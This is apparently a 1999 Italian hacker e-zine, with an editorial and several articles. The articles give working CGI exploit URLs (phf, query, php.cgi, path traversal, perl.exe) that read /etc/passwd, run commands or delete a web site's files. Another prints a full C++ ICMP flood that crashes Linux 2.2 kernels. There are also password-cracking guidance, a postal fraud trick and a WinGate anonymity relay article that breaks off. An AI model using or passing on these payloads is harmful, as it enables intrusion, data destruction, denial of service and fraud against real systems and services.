++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +/\ \ __/\ \ /\ \ BoBo & LaNdo + +\ \ \/\ \ \ \ __ ___ ___ __ \ \ \____ __ + + \ \ \ \ \ \ \ /'__`\ /' _ `\ /' _ `\ /'__`\ \ \ '__`\ /'__`\ + + \ \ \_/ \_\ \/\ \ \.\_/\ \/\ \/\ \/\ \/\ \ \.\_\ \ \ \ \/\ __/ + + \ `\___x___/\ \__/.\_\ \_\ \_\ \_\ \_\ \__/.\_\\ \_,__/\ \____\+ + '\/__//__/ \/__/\/_/\/_/\/_/\/_/\/_/\/__/\/_/ \/___/ \/____/+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Numero 0 - 1 ottobre 1999 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- -Responsabilit: + +Usa queste informazioni a tuo rischio e pericolo. Noi dell'e-zine Wannabe, - -l'Attila_Hack Crew e qualsiasi altra persona ci abbia aiutato a scrivere + +questa e-zine non si assumer nessuna responsabilit per l'uso scorretto - -questa rivista. + +Le seguenti informazioni sono state scritte solamente per scopo educativo e - -informativo e non devono essere usate per scopi illegali, ma solo per + +difendersi da persone che usano queste informazioni in maniera sovversiva. - - Attila_Hack Crew e Wannabe_1999 Staff + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- Editoriale e saluti: (non tanto brevi:)) Ehehehe 26/settembre/1999 a cura di BoBo with collaboration Zio Marzo Salve ragazzi/e questa nostra e-zines nata il 20 giugno di questo anno quando per caso io e Zio Marzo ci siamo incontrati su irc e chattando un po siamo arrivati alla conclusione che la scena underground hacker/cracker/phreaker poteva aver bisogno di un'altra e-zine. Ma perch ancora una e-zine? Non ce ne sono gi un casino in giro? Bh in effetti di e-zine la scena underground italiana ne piena, a partire dalla stupenda e inimitabile BFI con cui colgo l'occasione per salutare \sPIRIT\, per poi passare a Newbies (Nobody e ZeroCool stanno facendo un ottimo lavoro), infine, come non nominare Netrunners e RigorMortis (no, ehehehehe Rigor_Mortem:), ti ricordi?), per la cronaca giusto citare anche le ultime tre e-zine nate, una di Tormento, una di BoBByMetal "Hjacker" e un'altra "Anarchy in the system" di Oldiron61 che spero possano proseguire e diventare famose come Netrunners-BFI e Newbies. Allora... ragazzi, questa e-zine nata perch anche l'Attila_Hack Crew voleva contribuire con una propria rivista dedicata all'h/c/p/v nella scena Italiana e volevamo rendere disponibili i molti articoli che arrivavano all'indirizzo e-mail di Attila_Hack, quindi abbiamo cercato di unire l'utile al dilettevole :) formando una e-zine che raccogliesse oltre agli articoli, le opinioni, le richieste e le critiche del suo pubblico. Allora... vorrei salutare: \\Ken e Julie-tte due miei amici di #kenshiro e #valvolin3 (hei ken se non ci fossi tu come farebbero quelli della Valvoline Crew:)) P.S. siete Stramiticuzzi :)Dheheheiiihhihiuhuhuhu Poi vorrei salutare TUTTA la Valvoline Crew (il vostro sito semplicemente stupendo:)) e in particolare valv0 che mi ha dato subito la sua disponibilit per "costruire" una e-zine decente (hei valv0 sei simpaticissimo ;-)) Poi un saluto particolare va a Quequero, una persona disponibile a risolvere ogni mio piccolo dubbio, oltre ad essere un cracker eccellente (boooni quelli della pavesi :)) un mio grande amico e non per niente un Attila_Hack MemberZ :). Hei ancora non conoscete l'Universit Italiana Crackers? AARRRGGGGHHHHHHH Oddio ecch c'e state aff ar mondo, il fantastico progetto U.I.C. del grande Quequero diventato ora realt, correte immediatamente ad iscrivervi, il sito di Quequero lo trovate nella sezione links del sito di Attila_Hack o alla fine di questa e-zine. Un grazie particolare va a b0nu$ anche lui Attila_Hack MemberZ, una persona mezzo uomo e mezzo Tasm :) (vero Que?). Poi ringrazio anche tutti gli altri Attila_Hack MemberZ che sono: Reset, Ritz, Away, Xio Buttha (il cuggino di Buttha Spp Member) (da notare che le due g sono volontarie eheheh, vero Buttha? ;)), Kernel 2.3.3, IlCraccatore, TorpedoBlu e The Pac-Man per la loro collaborazione e per il supporto morale e pratico che mi hanno dato, Scully per le traduzioni che fa, Freak e Chewie (allora..il progetto pulce che fine ha fatto?). I mieiei migliori saluti li mando a tutti gli Spp e in particolare a Buttha, che il Budda del newsgroup alt.hackers.cough.cough.cough, a Fritz per il malinteso che era sorto non molto tempo fa (beh spero che adesso diventeremo amici no?:)), e non posso non rinominare Rigor_MorteM (u, ma non mi dovevi mandare un articolo per l'e-zine, almeno fatti sentire no? :)) Altri ringraziamenti vari vanno a tutti i RingZer0 e a quelli di #crack-it, in particolare a Furb3t (che non risponde quasi mai alle mie mail :(), Neureal_en, sPEzio, Black Druid, e rinomino volentieri Away e Ritz che hanno scritto un bel po di articoli in pochi giorni (uau siete proprio dei bravi ragazzi :)), a Kalidor che doveva scrivere qualcosa per noi, ma non si fatto pi sentire, a Oldiron61 (u Oldiron mi dispiace, ma i tuoi articoli non li possiamo mettere...motivo? Alcuni di noi non sono d'accordo nel trattare l'argomento Anarchy comunque complimenti per la tua e-zine che davvero simpatica), a Lord Guf per le sue critiche costruttive :), al root di dislessici.org (mi raccomando continuate cos :)), a Cavallo de Cavallis che quando gli ho chiesto se voleva scrivere qualcosa per noi mi ha risposto come risponde Homer e io non ho capito se era un si o un no :), a Mr_Skull, a LiQUID, a BugByte, a S2, ad Avatar,a CDP, a tutto lo Spaghetti Phreaker Team e poi....bho non mi ricordo pi :) se mi sono dimenticato qualcuno segnalatemelo e provveder all'uscita della prossima e-zine. Ah..due ringraziamenti particolarissimi vanno a Zio Marzo (questa e-zine un idea anche sua :)) e a LaNdo che sarebbe il MAESTRO, il GURU di Linux e *nix, un mago della programmazione e il pistolero solitario delle reti, piu famoso con il nick: il server Vivente... Hehehe:). Mi sono giunte voci che dicevano che Hack Nirvana era un Attila_Hack MemberZ. QUESTO NON E' ASSOLUTAMENTE VERO. Adesso vorrei chiudere questa parentesi e non aprire + discussioni su "Hack Nirvana Lamer o Hacker?", a questo ci penseranno gli Spp che a quanto ho sentito sono stati attaccati direttamente da H_N. Beh con questo spero di aver finito vi voglio anche ricordare che per la realizzazione di questa e-zine non stata maltrattata nessuna bestia dello Zoo "Il Timone". Hei Valvoline il tuo sito Fuck su quelli del timone mi ha fatto morire dal ridere Hahahaha, se non ci fossi tu? Ti inventerei io ;) Ultima cosa e poi vi lascio in pace davvero :), allora... vi volevo solo dire che se non siete soddisfatti dell'e-zine e avete qualche idea per migliorarla segnalatelo a attila_hack@hotmail.com e a wannabe_1999@hotmail.com, tutte le vostre critiche, obiezioni e tutti gli articoli che manderete saranno presi in considerazione e se saranno ritenuti/e validi/e saranno pubblicati/e. Per concludere (che???!?!??! ma ancora non te sei rotto de scrive sta cavolo de intro?) si vabb allora vi volevo finire di dire :) che tutti gli errori di itagliano e di inglese sono copirait dell Wannabe Staff 1999:))). Godetevi l'e-zine BoBo e Zio Marzo Attila_Hack MemberZ (`..`..-> Attila_Hack crew <-..`..) ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ||A |||T |||T |||I |||L |||A |||_ |||H |||A |||C |||K || ||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|| |/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\| Url: http://www.attilahack.cjb.net mailing list: attila_hack@egroups.com e-mail: attila_hack@hotmail.com newsgroup: alt.hackers.attila_hack (solo dal news server: news.tiscalinet.it) irc: #hack-it, #muretto, #crack-it, #wannabe, #attila_hk, #it@lia, #phreak-it <======================================CUT HERE=======================================> *------ ARTICOLI -------------------------&----------------------------- AUTORI ------* <=====================================================================================> #-[Manifesto degli Attila_Hack MemberZ e del Wannabe Staff]---------------------------# #-[Sezione Hacking]-------------------------------------------------------------------# #---[Cgi che passione!!!]--------------------------------------------+Mr_Skull+-------# #---[Come Hackerare il servizio postale!]----------------------------+BoBo+-----------# #---[Piccoli bug CRESCONO!]------------------------------------------+LaNdo+----------# #---[E adesso che ho il file delle pwd?]-----------------------------+Zio Marzo+------# #---[Come essere anonimi nel web, su irc e con l'invio di mail]------+Away+-----------# #---[Come Hackerare i siti porno! E anche guida ai server Proxy]-----+LiQUID+---------# #-[Sezione Cracking]------------------------------------------------------------------# #---[First Crack]----------------------------------------------------+Away+-----------# #---[Come craccare: "Ma quanto mi costi 3.0"]------------------------+Ritz+-----------# #---[Come craccare PGP 5.5.5 ]---------------------------------------+Ritz+-----------# #---[Manuale di cracking Prima parte]--------------------------------+S2+-------------# #-[Sezione Programming]---------------------------------------------------------------# #---[Impariamo l'Assembler-Prima parte-Intro, sist. di num. ed elem. di logica]+b0nu$+# #-[Sezione Linux]---------------------------------------------------------------------# #---[Installare Linux]-----------------------------------------------+LiQUID+---------# #---[Ricompilare il Kernel]------------------------------------------+LaNdo+----------# #---[Routing & Masquerading in Linux]--------------------------------+LaNdo+----------# #-[Sezione Phreaking]-----------------------------------------------------------------# #---[D'amore, di Phreaking e di altre sciocchezze]-------------------+The Pac-Man+----# #---[Come crittare le telefonate e pagare un'urbana invece che un'interurbana]+BugByte# #-[Sezione Lamah]---------------------------------------------------------------------# #---[Come valangare di ping un ip con la legge dalla nostra parte]---+Mr.Lamah+-------# #---[Interagire con telnet e BO]-------------------------------------+Mr.Lamah+-------# #-[Sezione Viriing]-------------------------------------------------------------------# #---[Virus che passione!!!]------------------------------------------+Ritz & Quequero+# #-[Info varie]------------------------------------------------------------------------# #---[Cosa sono e come si usano gli anonymous remailer]---------------+Quequero+-------# #---[Come creare un Newsgroup!]--------------------------------------+BoBo+-----------# #---[Come mantenere un sito Warez]-----------------------------------+LiQUID+---------# #---[Due metodi per diventare OP con una botta di culo!!!]-----------+ZioButtha+------# #---[Mandare SMS GRATISSS!!!(sia da internet sia dal cellulare)]+Spaghetti Team & BoBo# #---[Come mandare SMS ANONIMIIIII!!!!]-------------------------------+The Crazy+------# #-[Riflessioni del Wannabe staff]-----------------------------------------------------# #---[Un blocco di testo inutile]-------------------------------------+S2+-------------# #---[Per non dimenticare (Atomic)]-----------------------------------+Away+-----------# #-[LinkZ a siti hacker, cracker e reverser]--------------------------+Reset+----------# #-[Intervista all'Hacker di Jobs.com]--------------------------------+Reset+----------# <======================================CUT HERE=======================================> Manifesto degli Attila_Hack MemberZ e del Wannabe Staff: Gli Attila_Hack MemberZ e il Wannabe Staff sono un gruppo di persone che si unito per allargare le proprie conoscenze nei campi Hacker, Cracker, Reverser e Phreaker. Il loro scopo quello di aiutarsi a vicenda anche nei campi della programmazione e nell'utilizzo di sistemi operativi!! Non DEVE essere dimenticato che ogni membro una singola persona, quindi, risponde e risponder per le sue azioni come singolo, senza incolpare altri Membri per aver attuato quello che era scritto in un articolo o per aver utilizzato un informazione per scopi illegali. Gli Attila_Hack MemberZ e il Wannabe Staff si sono formati per scopo informativo e culturale, quindi in un paese come l'Italia in cui regna la libert d'informazione veniamo considerati dallo stato come un gruppo di persone che studia soltanto e non applica MAI le tecniche discusse e scritte dai membri. Attila_Hack Crew e Wannabe_1999 Staff +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- _______ _______ ______ _____ _____ __ _ _______ |______ |______ ____/ | | | | \ | |__BoBo & LaNdo ______| |______ /_____ __|__ |_____| | \_| |______ _ _ _______ _______ _ _ _____ __ _ ______ |_____| |_____| | |____/ | | \ | | ____ | | | | |_____ | \_ __|__ | \_| |_____| CGI CHE PASSIONE: by Mr_Skull ------------<[ /cgi-bin/ ]>------------------------------------------------------------ Autore: Mr_Skull Consumo: 1 bicchiere d'acqua (bicchiere da 1 litro) Musica ascoltata: Korn: Freak at a leash; The Immortals: Mortal Kombat Theme; Marilyn Manson: I don't like the drugs [but the drugs like me], Sweet dreams (are made of this) Saluti: a mR_bIs0n, al NewBies Staff, a ZioMarzo, al bfi staff, e a tutti gli "smanettoni", nonch ad Andrea Monti Fuck a: tutti quelli che dicono di dire la verita dicendo di non dire mai la verit... Barzelletta: L'uomo con il volto da eterno fanciullo...-TG3 (era riferito a Bill Gate$) ------------------------Indice: 0) Disclaima 1) Cgi? 2) Il FAMOSISSIMO phf 3) Il FAMOSISSIMO perl 4) Il FAMOS... no, altri cgi 5) Cgi scanners 6) Conclusione ------------------------0) Disclaima NON MI ASSUMO UN CACCA DI RESPONSABILITA' PER L'USO CHE NE FARETE DI QUESTE INFORMAZIONI. SE SIETE UN WANNABE O NEWBIES O CHE DIR SI VOGLIA NON DANNEGGIATE I SISTEMI. SE SIETE UN ROOT PERFAVORE NON PROTEGGETE I VOSTRI SISTEMI :) Una sera su irc viene ZioMarzo e mi dice: : ciao Mr, ti andrebbe di scrivere per una nuova e-zine? (beh, veramente il dialogo era pi- luuuuungo, ma comunque...) Naturalmente ho accettato, e cos eccomi qua a scrivere per Wannabe. Da notare che io scrivo sia per Wannabe che per NewBies... Dopo aver concordato sulla parcell... ehm, dopo una discussione, gli ho detto vabb, scriver qualcosa sul cgi... Ed eccomi qua! ------------------------1) Cgi? Cgi se non mi sbaglio (sbaglio) sta per Common Gateway Interface. Che vuol dire? Aspe' che prendo il vocab... eh, vabb... non avete mai notato in un sito web un link che vi dirotta su www.sitochestatevisitando.com/cgi-bin/pinko.cgi?CICCIO%20+%20BEVE ? Ecco, pinko.cgi un cgi! (intuizione degna di nota...). Un cgi un programma scritto in c, perl, o che dir si voglia che pu essere eseguito dal server web. Nella cartella /cgi-bin ci sono tutti i cgi di un server. E a noi che ce ne frega? Direte voi. Beh, se io vi dicessi che molti di kuesti cgi sono exploitabili e che se alcuni girano come root potrete addirittura eseguire dei comandi e vedere i risultati sul vostro browser di fiducia? (LYNX FOR EVER!) Qualche volta avrete sentito nominare ------------------------2) Il FAMOSISSIMO phf Il phf il mio cgi preferito! Permette di eseguire tutti i komandi concessi al web server, reindirizzando l'output sullo strumento che avete usato per fare quel comando, anke sul BrOwSeR! E immaginate se il Web Server gira come root ;). Se trovate un server vulnerabile a questo attacco, provate a digitare questo: www.servervulnerabileallattacco.gov/cgi-bin/phf?Qalias=x%0a/usr/bin/id Se vi da come risultato uid = 0 e gid = 0, SIETE ROOT! Ma aspettate, ultimamente mooooolti root difficilmente vi faranno entrare nel cgi-bin... Comunque, quando ne trovate uno (come primo server tutto lecito, anche www.sodomizing-systers.org(asmo)... ma non perdiamo il discorso. Se vi pizzicasse la voglia di qualcosa di buono, prendete un ferrero rocher (ok, la pianto con le scemenze). Se al posto del comando id ci voleste mettere un bel cat /etc/passwd? Semplice... www.host.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd ove %20 il codice ascii della barra spaziale. Se inoltre avete uid=gid=0 potrete eseguire *tutti* i comandi che potrebbe eseguire un root (okkio, anche i web server loggano per...). Da notare: non omettete MAI il parametro Qalias=x%0a senn non vi funziona un kakka... Ma penso che l'avrete capito... Bene, il phf disponibile solo su sistemi Unix e soci, ma se volessimo bucare un server NT? Eheheeh, Microsoft naturalmente fa solo prodotti che soddisfano gli utenti (noi wannabe e gli hackers seri). Allora, in assenza del piaccaeffe si usa ------------------------3) Il FAMOSISSIMO perl Se avete trovato un web server lamer che gira su NT (non vi preoccupate, gi... il fatto che girano su nt...), potrete provare ad utilizzare l'eseguibile perl.exe che si trova nella cartella (indovinate un po') /cgi-bin L'utilizzo di codesto eseguibile non si discosta molto dal phf... vi permette di eseguire i comandi in linguaggio perl (grande intuizione) Ad es. Volete che il vostro amato perl elimini il sito? Niente di pi- facile: www.sitochestapermorire.com/cgi-bin/perl.exe?-e+unlink+%3C*%3E gli farete cos eseguire il comando unlink <*> infatti il parametro -e serve a dire al perl di eseguire il comando che scriveremo dopo, e %3C e %3E per chi non lo avesse ancora capito sono i codici ASCII di "<" e ">" senza gli apici... Naturalmente danneggiare un web server non affatto considerato 313373 e potreste avere gravi rimorsi, sapendo di averlo fatto. Quindi, studiatevi il perl e vedete tutti gli altri comandi fattibili... Ora che ho parlato di phf e perl, i due progs pi- famosi, non mi resta che ------------------------4) Il FAMOS... no, altri cgi Bene bene, vediamo un po' altri cgi spesso trascurati... php.cgi (da non confondere con phf :)): vi permette di visualizzare qualsiasi file (sempre che il web server ne abbia il permesso). Ad esempio: www.telekozz.it/cgi-bin/php.cgi?/etc/passwd e se non vi esce un bel Not Allowed, avrete le password (criptate)!!! view-source: anche con questo potrete vedere un file qualsiasi... Esempio: www.telekozz.it/cgi-bin/view-source?../../../../../etc/passwd NOTA: necessario andare prima nella dir. "/", cosicch bisogna fare prima un bel po' di ../ tanti quante sono le directory per le quali passa il web server... htmlscript: funziona in modo analogo al viewsource quindi vedi sopra query: Vi pu far eseguire dei comandi: www.telekozz.it/cgi-bin/query?%0a/bin/cat%20/etc/passwd bella vero? nph-test-cgi: vi fa vedere i files di una directory prescelta: www.telekozz.it/cgi-bin/nph-test-cgi?/etc/* ;contenuto della cartella /etc www.telekozz.it/cgi-bin/nph-test-cgi?* ;contenuto della cartella /cgi-bin/ Bene, io avrei phinito, ma devo dire che ci sono PAREKKI altri cgi, pi- di 60!!! Ma come fare a provarli tutti??? Semplice, con i ------------------------5) Cgi scanners Questi sono dei semplici programmini che si connettono all'indirizzo prescelto sulla porta web e iniziano a provare tutti i cgi per i quali sono stati programmati :) Per chi avesse intenzione di farsene uno proprio, tenete queste dritte: * per prelevare un file dal web si usa il comando GET * conviene anche prendere informazioni sul web server usato * vedete cosa vi risponde e printate se affermativo o negativo, non la risposta, altrimenti inkasinate tutto all'utente medio. Per i pi- pigri cercate su astalavista.box.sk o su www.rootshell.com Troverete di sikuro kualkosa per voi ;) Anche questa volta sono arrivato alla ------------------------0) Conclusione Spero di avervi dilettato con questo articolo. Senn, mi spiegate come avete fatto a leggervi 178 righe? Vi prego inoltre di segnalarmi eventuali errori concettuali (sono solo un newbie io). Se volete contattarmi lo potete fare su IRC dalle 8 alle 9 (in genere) e mi trovate su #hackernow con il mio nick (Mr_Skull). Saluti e mi raccomando, non bucate sistemi se non sapete nascondere il vostro passaggio. Mr_Skull -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ COME HACKERARE IL SERVIZIO POSTALE: by BoBo Data: 10 luglio 1999 Cibo consumato: una scatola di mangime per gatti :) sono le 4 di notte e ho un'aria felina :)) Musica ascoltata: The Cat Woman Theme, Occhi di gatto di bimbomix Compilation Allora.... ragazzi e ragazze adesso parliamo dell'esame orale di maturit che ho dato stamattina.....cosa??!?!?!??? Non ve ne frega niente.....vabb, parliamo di dove andr in vacanza.... bh???!!!! non vi importa niente neanche di quello? Hehehe parliamo di come fottere il servizio postale? Hey? anche questo non vi interessa? Perch? Ah..ho capito allora voi la posta tradizionale non la usate pi.... siete nati nell'era tecnologica e comunicate solo tramite e-mail/irc/icq!!!! Beh, ma pur di qualcosa vi devo parlare noo? Ci sar qualcuno interessato su come non pagare le lettere che invia da casa? Hei tu che alzi la mano li in fondo: 6 banco a destra vicino alla finestra, vuoi sapere come spedire lettere assolutamente gratis da casa? No?!? devi solo andare in bagno? e io nun-te-ce mando....ti mo fattela sotto e ascolta chettedice BoBo:). allora...bando alle ciance, cominciamo: Allora...questo metodo mi venuto in mente non molto tempo fa, ed strano che sia venuto in mente proprio a me (maccheccavolo sto a d) Vabb allora consiste nel riutilizzare le buste che vi arrivano a casuccia dallo Stato, io, personalmente utilizzo le buste della Playstation, quelle che arrivano con il catalogo dei giochi....insomma utilizzate le buste che vi pare basta che al posto del francobollo ci sia scritto "Spedizione in abbonamento postale Stampe non periodiche Autorizzazione Filiale di Milano-Roma-Napoli" (dipende da dove abiti). Poi cambiate il destinatario con quello che vi pare et voil le jeux sont fait. Se non l'avete ancora capito, voi spedendo quella busta a chi vi pare non pagherete una lira, infatti, sar recapitata al vostro amico GRATIS. Nota Finale: Per questa tecnica state sicuri io l'ho gi provato e funge al 100*100. Senn adesso vi scriverei dar gabbio :) Approfitto per ringraziare ZioMarzo, LaNdo, Scully, tutti gli Attila_Hack MemberZ, gli amici di #crack-it e poi tutti quelli che gia ho salutato all'inizio :)). P.S. Tutti gli errori di Itagliano sono puramente casuali e dovuti a circostanze misteriose:)) +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- PICCOLI BUG CRESCONO (!!!) by LaNdo (from rootshell) Bug Kernel 2.2.x Eccovi un bel bug del nuovo kernel di Linux....eheheheheh buon divertimento !!!! Esiste un bug per quanto riguarda il nuovo kernel 2.2.x di Linux (testato su 2.2.7 e 2.2.9), questo bug manda in "kernel panic" quando si spediscono al pc col suddetto kernel un grande numero di pacchetti ICMP particolari. Penso che la causa di questo sia dovuta ad una combinazione tra la lunghezza degli header e il cambio (random) di tipo, sottotipo e mittente dei pacchetti spediti. Winzozz 9x e FreeBSD 3.0 non ne sono affetti. Il codice sottostante (da usare sotto Linux) spedisce pacchetti random: modificando tipo, sottotipo e mittente. Questo codice potrebbe non "girare" sulla vostra distribuzione (questo non vuol dire che non ne siete affetti...) Il codice va compilato col compilatore del c++: g++ exploit.cpp -o exploit ---------------------------------------------------------------------------- copia e incolla ---------------------------------------------------------------------------- #include #include #include #include #include #include #include #include #include #include #include #include struct icmp_hdr { struct iphdr iph; struct icmp icp; char text[1002]; } icmph; int in_cksum(int *ptr, int nbytes) { long sum; u_short oddbyte, answer; sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; *((u_char *)&oddbyte) = *(u_char *)ptr; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } struct sockaddr_in sock_open(char *address, int socket, int prt) { struct hostent *host; if ((host = gethostbyname(address)) == NULL) { perror("Unable to get host name"); exit(-1); } struct sockaddr_in sin; bzero((char *)&sin, sizeof(sin)); sin.sin_family = PF_INET; sin.sin_port = htons(prt); bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length); return(sin); } void main(int argc, char **argv) { int sock, i, ctr, k; int on = 1; struct sockaddr_in addrs; if (argc < 3) { printf("Usage: %s \n", argv[0]); exit(-1); } for (i = 0; i < 1002; i++) { icmph.text[i] = random() % 255; } sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("Can't set IP_HDRINCL option on socket"); } if (sock < 0) { exit(-1); } fflush(stdout); for (ctr = 0;ctr < 1001;ctr++) { ctr = ctr % 1000; addrs = sock_open(argv[1], sock, atoi(argv[2])); icmph.iph.version = 4; icmph.iph.ihl = 6; icmph.iph.tot_len = 1024; icmph.iph.id = htons(0x001); icmph.iph.ttl = 255; icmph.iph.protocol = IPPROTO_ICMP; icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) + ((random() % 255) * 65535) + ((random() % 255) * 255) + (random() % 255); icmph.iph.daddr = addrs.sin_addr.s_addr; icmph.iph.frag_off = htons(0); icmph.icp.icmp_type = random() % 14; icmph.icp.icmp_code = random() % 10; icmph.icp.icmp_cksum = 0; icmph.icp.icmp_id = 2650; icmph.icp.icmp_seq = random() % 255; icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024); if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1) { if (errno != ENOBUFS) printf("X"); } if (ctr == 0) printf("b00m "); fflush(stdout); } close(sock); } ---------------------------------------------------------------------------- copia e incolla ---------------------------------------------------------------------------- Internet Explorer 5 bloccato Questo codice se fatto "leggere" da Internet Explorer 5 con Javascript attivato lo fa bloccare: Divertitevi pure......... potete anche apportare delle variazioni al codice non difficile: --------------------------------------------------------------------------- copia e incolla --------------------------------------------------------------------------- --------------------------------------------------------------------------- copia e incolla --------------------------------------------------------------------------- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- E ADESSO CHE HO IL FILE DELLE PASSWORD?: By ZioMarzo -------->Vi avverto che questo articolo solo per chi gi in possesso del "famoso" file .<------------- Credo che questa sia la domanda pi ricorrente nella mente di un wannabe quando riesce finalmente dopo tanti sforzi a reperire dalla grande rete un file delle passwd , ho ragione vero ? Ebbene in questo articolo cercher di illuminarvi per evitare che in futuro questo dubbio amletico continui ad assillarvi . Una volta avuto il file bene aprirlo ; basta un semplice editor di testo ( prima fatene una copia da qualche altra parte ) quando l'editor avr aperto il file , vi si presenter uno spettacolo del genere : root:9IDv/CqdFuqWo:0:0:Super User:/:/bin/csh sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh daemon:*:1:1:daemons:/:/dev/null bin:*:2:2:System Tools Owner:/bin:/dev/null uucp:*:3:5:UUCP Owner:/usr/lib/uucp:/bin/csh fax:*:3:10:Fax:/var/spool/fax:/bin/sh sys:*:4:0:System Activity Owner:/var/adm:/bin/sh adm:*:5:3:Accounting Files Owner:/var/adm:/bin/sh lp::9:9:Print Spooler Owner:/var/spool/lp:/bin/sh nuucp::10:10:Remote UUCP User:/var/spool/uucppublic:/usr/lib/uucp/uucico auditor:*:11:0:Audit Activity Owner:/auditor:/bin/sh dbadmin:*:12:0:Security Database Owner:/dbadmin:/bin/sh rfindd:*:66:1:Rfind Daemon and Fsdump:/var/rfindd:/bin/sh demos::993:997:Demonstration User:/usr/demos:/bin/csh OutOfBox::995:997:Out of Box Experience:/usr/people/tour:/bin/csh guest:iu77KKmsN2:998:998:Guest Account:/usr/adm/guest:/bin/csh nobody:*:60001:60001:Nobody:/dev/null:/dev/null noaccess:*:60002:60002:uid no access:/dev/null:/dev/null nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null www:*:20:10:The Web Slinger:/web/www:/bin/csh webadmin:ecKu77KmsNALs:0:0:Sysadmin web account:/:/bin/sh testact::1000:10:Test Account:/:/bin/mail ftp:*:60001:60001:FTP ACCOUNT:/ftp:/dev/null Bene , arrivati a questo punto tutti si chiedono : " e adesso cosa me ne faccio ? " Guardate bene il contenuto del file , quelli sono tutte le login e le passwd di tutti gli utenti e di tutti i servizi ; voi vi starete a chiedere come fare a distinguerle; ve lo spiego io : root: 9IDv/CqdFuqWo: 0: 0: Super User: /: /bin/csh <------- questa la 1 riga cio quella che riguarda il root o il sysadmin ( l'amministratore del sistema , quello che sguazza nei vostri dati e fa i suoi porci comodi solo perch ha una passwd di ma ) La riga che vedete sopore pu essere vista anche cos : root: 9IDv/CqdFuqWo: 0: 0: Super User: /: /bin/csh Login: Passwd Criptata: UserID: GroupID: RealName: Home Directory: Shell Ora che avete la passwd criptata non dovete far altro che decriptarla ; per fare questo lavoro che risulterebbe impossibile altrimenti sono stati creati pi programmi ma tra questi uno si distingue : John The Ripper . I furboni che hanno inventato Unix/Linux hanno anche inventato un metodo di criptazione ( il DES ) che chiamato One-way ; one -way significa che da una parola normale si pu risalire a quella criptata ma non il contrario . Vi chiederete , ma se non possibile decriptare le parole John The Ripper come fa ? Ebbene , questo magnifico programmino contiene delle liste di parole ( vocabolari ) che possono contenere parole di carattere tecnico , comune , ecc. oltre a contenere i dati dell'utente scelto ( nome , login ecc. ) le quali vengono criptate di continuo e confrontate con la passwd da trovare , finche non combacia ; ma questo un'altra storia . Adesso che avete la passwd , potete fare quello che ne volete ma state attenti !!! Byz ZioMarzo (section e.zine's ) (`..`..-> Attila_Hack crew <-..`..) ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ||A |||T |||T |||I |||L |||A |||_ |||H |||A |||C |||K || ||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|| |/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\| Url: http://www.attilahack.cjb.net mailing list: attila_hack@egroups.com e-mail: attila_hack@hotmail.com newsgroup: alt.hackers.attila_hack (solo dal news server: news.tiscalinet.it) irc: #hack-it, #muretto, #crack-it, #wannabe, #attila_hk, #it@lia, #phreak-it +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- COME ESSERE ANONIMI NEL WEB, SU IRC E QUANDO DECIDIAMO DI MANDARE UNA MAIL ATTENZIONE: Non utilizzare le informazioni contenute in questo file per cose illegali: il contenuto e' da ritenersi solo a scopo didattico, o comunque per uso accettato dalla legge. L'autore non si ritiene responsabile del cattivo uso delle informazioni qui contenute. ******************************* ANONIMI NEL WEB/IRC/MAIL alternativa ai server proxy ******************************* di /\\ \/ //\\ / / \\/\// \\/ threenails / Premessa: se vi e' mai capitato di dovervi collegare sul Net e avete avuto la necessita' di restare anonimi (per qualsiasi motivo) e non sapevate come fare, beh questa e' una guida che possibilmente vi risultera' utile. Esistono i server proxy ed esiste anche un'alternativa. Informazioni sui server proxy le trovate sul nostro sito e in migliaia di altri posti. Qui parliamo dell'alternativa. "Introduzione" L'alternativa e' saltellare di qua' e di la' utilizzando una falla nel programma WinGate. Ma che e'? WinGate e' un programma per Win utilizzato nelle LAN per far accedere diversi computer alla rete per mezzo di un solo modem e di un computer che, come si dice, fa da gateway, da ponte, diciamo. E noi che c'entriamo (e soprattutto come ci entriamo)? Semplice, tale programmino apre una porta 23 (quella standard TELNET) sui computer in cui e'installato: tramite tale porta e il telnet noi avremo un account, e tramite questo potremo collegarci da altre parti, spedire email, usare 